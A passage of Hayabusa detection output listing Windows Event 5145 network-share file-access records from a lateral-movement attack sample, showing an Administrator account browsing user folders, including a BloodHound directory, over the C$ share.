0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.037 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.037 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.037 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.047 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.047 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.047 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.057 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.057 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.057 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.057 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.067 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.067 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.067 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.077 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.077 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.087 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.087 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.087 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css | IP Addr: 10.0.2.15 | 